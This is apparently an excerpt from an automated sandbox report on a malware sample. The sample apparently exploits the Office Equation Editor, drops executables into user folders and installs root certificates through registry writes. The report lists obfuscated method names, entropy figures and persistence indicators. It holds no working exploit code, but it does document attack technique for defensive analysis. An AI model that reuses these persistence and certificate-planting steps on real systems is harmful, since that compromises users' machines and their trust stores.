                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A5962 push esi; ret 2_2_002A5963
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C288 pushad ; retn 0029h2_2_0029C289
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002A58F3 push esp; ret 2_2_002A5903
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002901F4 push eax; retf 2_2_002901F5
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0029C2C8 pushad ; retn 0029h2_2_0029C2DD
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00298ED5 push eax; retf 2_2_00298F61
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_00219A1B push eax; retn 0017h5_2_00219A25
                Source: vnobizxc[1].exe.2.drStatic PE information: section name: .text entropy: 7.7368081138603095
                Source: obibingf24242.exe.2.drStatic PE information: section name: .text entropy: 7.7368081138603095
                Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 5.2.obibingf24242.exe.410000.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 5.2.obibingf24242.exe.26e4c5c.5.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
                Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                Source: 5.2.obibingf24242.exe.26d8818.4.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, D0OGH51qG7TrJUYkAK.csHigh entropy of concatenated method names: 'JR1JRG4y8a', 'vkKJELq1PC', 'l5sJs5sanZ', 'vc3JU9mP0w', 'udAJwk20H2', 'NVOJAsXNxk', 'vZrJGXjZpa', 'hOYJ1ONTlx', 'vkBJeFlcO3', 'UfHJqc9CV3'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, YqOlYl2eFwtfPkt21E.csHigh entropy of concatenated method names: 'zeuskKjA1L', 't6dsi7fBC6', 'HtBsISLSjw', 'IjpsWUhMnN', 'GbBsNlvb8J', 'MudsDxrVUJ', 'jrMsSOuYyZ', 'lxPsfYHPr4', 'FOasMfJJ1Z', 'PsVsOWW9qL'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, MhaIhDzaPUNsFfpULt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BeHV4wgTlM', 'oqSV0vtKm2', 'FRCVj69MJH', 'I5bVHhfCuL', 'bGsVKaNcsB', 'yQ2VVSVK2Y', 'G6UVX46uPx'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, RqmCPZsVMMv5nbrMN6.csHigh entropy of concatenated method names: 'Dispose', 'TqEvMbYPBl', 'E1Dbl6QgMl', 'aLH9986UWT', 'fvIvOGDt4q', 'zpMvzXZpZX', 'ProcessDialogKey', 'fpCbuonY1J', 'u2Dbv8ygbK', 'QcGbbwGrKv'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, iNFWmT65K4oBOHdv97.csHigh entropy of concatenated method names: 'Wl4AR8MHHE', 'titAsqu8Kd', 'abTAwE5JMD', 'uogAGwP4vc', 'ujcA1qT3i8', 'eblwNEOGXG', 'm4uwDHFCio', 'QcSwS2rJtO', 'KaowfZguGr', 'ajXwMnqCsI'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, mdHoHt9MfgQhGOrMY7.csHigh entropy of concatenated method names: 'WFOvGqOlYl', 'lFwv1tfPkt', 'p3avqmmghX', 'wN9voE8Vt6', 'ndiv0ZgANF', 'TmTvj5K4oB', 'h2CgQ5y5XUUsiTJhmL', 'CZR8tK8FjhjBByWFCT', 'tSlvvtTwth', 'YalvJN7MuA'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, gkMdOYbUoH9rcjFeuZ.csHigh entropy of concatenated method names: 'd9wLtM8M4', 'Q0ug5PUUG', 'qIldgNNAC', 'bOQYR4RJA', 'jdec7qMwi', 'fwsQtawSe', 'q10rCeFp93vb3FnsYl', 'nAVdAUHX1OuFXTaYJ5', 'SReucDfU4e0o5OcQkW', 'hNbKyY2mW'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, PonY1JM82D8ygbKCcG.csHigh entropy of concatenated method names: 'n2LK6NIN2w', 'DPiKl4fHrB', 'K1sK72UjWb', 'Om9K5FsIXk', 'hkJKkFF2wb', 'YxtKpoI6uL', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, OOJ1Sjc3ammghXBN9E.csHigh entropy of concatenated method names: 'jy7UgP62MX', 'f3uUdagdZm', 'X4AU26DqcP', 'aysUcGwFIG', 'wbPU0hveJe', 'vEMUjDqhgi', 'ib2UH07rxZ', 'gHiUKaMWDi', 'GemUVCvHPy', 'X2wUXKmYVB'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, ChekuZ3HCIwSmN8ZNP.csHigh entropy of concatenated method names: 'agrGEhicPZ', 'FydGUJrVl5', 'cK2GA3q7rS', 'DAqAOVF3Jn', 'VtcAzxQMXs', 'cCAGunM6aN', 'AtFGvEHcbJ', 'EkQGb7xa9e', 'ncEGJrZ37u', 'eyuG9aSySR'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, LDBvEBvJJ3O33kFquaV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xi4XkqBNKI', 'Y2bXiB2U7k', 'FOxXIZQaM5', 'KamXW2Gu9D', 'IHvXN21gAX', 'KGtXDVUCTG', 'LdkXS8cZvG'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, ySkLlbvukfHRnCTtESI.csHigh entropy of concatenated method names: 'gLXVP5FDHj', 'aSkVZK37or', 'HG7VLuGtTa', 'soAVgBft2a', 'PtRVTjr7Id', 'rHaVdWW1jN', 'QjgVYcgLJ3', 'OmiV2hkTWw', 'Y55Vc8phEb', 'B2CVQTE6FE'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, aIGDt4fqLpMXZpZXEp.csHigh entropy of concatenated method names: 'SUAKEhmXdr', 'eHCKsVIEDR', 'SuuKUxDlwg', 'yRMKwgOGM8', 'xdlKA6pPcH', 'T94KG2yKTT', 'GjLK1KBe6N', 'ABlKejwfBe', 'bvaKqUYxLT', 'tDuKo8ou3Q'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, vVt6wEQ8mT4XM4diZg.csHigh entropy of concatenated method names: 'ClCwTDJJKM', 'EK9wYjjCoO', 'BT4U7LwcW0', 'MslU5ruEou', 'yViUp9dunO', 'iYDUhZUOZY', 'iqJU3vMfWW', 'forUFp8S7h', 'M3aUxR2uBi', 'LOsUrW5uAb'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, amwXR0CPXsVauy8NYU.csHigh entropy of concatenated method names: 'xej427V6Wx', 'vK54cfaJKy', 'Wrr46KdAK3', 'csA4l8JLTw', 'IxM45M4UWh', 'Hlf4pCYPVn', 'Jhk43K60U4', 'n7W4FJ2g0g', 'hRT4rn5FeS', 'jtN4txLWE7'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, oU7Yibkb84IpiWUtkd.csHigh entropy of concatenated method names: 'yub0rrljC9', 'XBj0mDHsd1', 'GtJ0kVWXBl', 'HVS0iZIqiF', 'Vsx0l1ixll', 'oHL07QU8Gl', 'epX05solxG', 'Rfq0pccQkJ', 'U3U0hDrX0A', 'nMG03rtVaT'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, iGrKvbOUPHtmRDgSTJ.csHigh entropy of concatenated method names: 'agEVvngImu', 'PIfVJA4aDy', 'XpcV9xXeCa', 'cYlVEpUVI1', 'HMdVsuspcd', 'MjAVwYTieb', 'rkEVAAFx1C', 'hG6KS3vCZW', 'BXBKfy9c9e', 'VnWKMcoctd'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, BXplLTWfheod5WBiyg.csHigh entropy of concatenated method names: 'C20Hq9Hcea', 'in6HoWY1Ve', 'ToString', 'mwoHEmyxQy', 'vtrHsBKQwQ', 'Sv3HUS5hyB', 'LiSHwocv62', 'zPTHAJxt9l', 'ayrHG3hdk7', 'kkXH17fwkk'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, Nffji0ITJKe56hgjhg.csHigh entropy of concatenated method names: 'ToString', 'eqfjtSCq4s', 'Hvwjl0v4Jh', 'ywsj7bq0Ac', 'qDvj5MlPCt', 'zv3jpXEof8', 'BJujhFb0bW', 'zC9j3jelJL', 'pu5jFnG9P6', 'FP1jxBAWBQ'
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, VTGJwXxvM7Ziv4PKG3.csHigh entropy of concatenated method names: 'bwLGPhyH4f', 'r0iGZb4V7x', 'RsoGLpDUXp', 'npTGgZC5vf', 'FXSGTg6wYe', 'u4AGdcJwvV', 'BaMGYDHCYX', 'fSfG2jlcJV', 'N5YGcprfQn', 'Cs5GQYEQ3k'

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obibingf24242.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
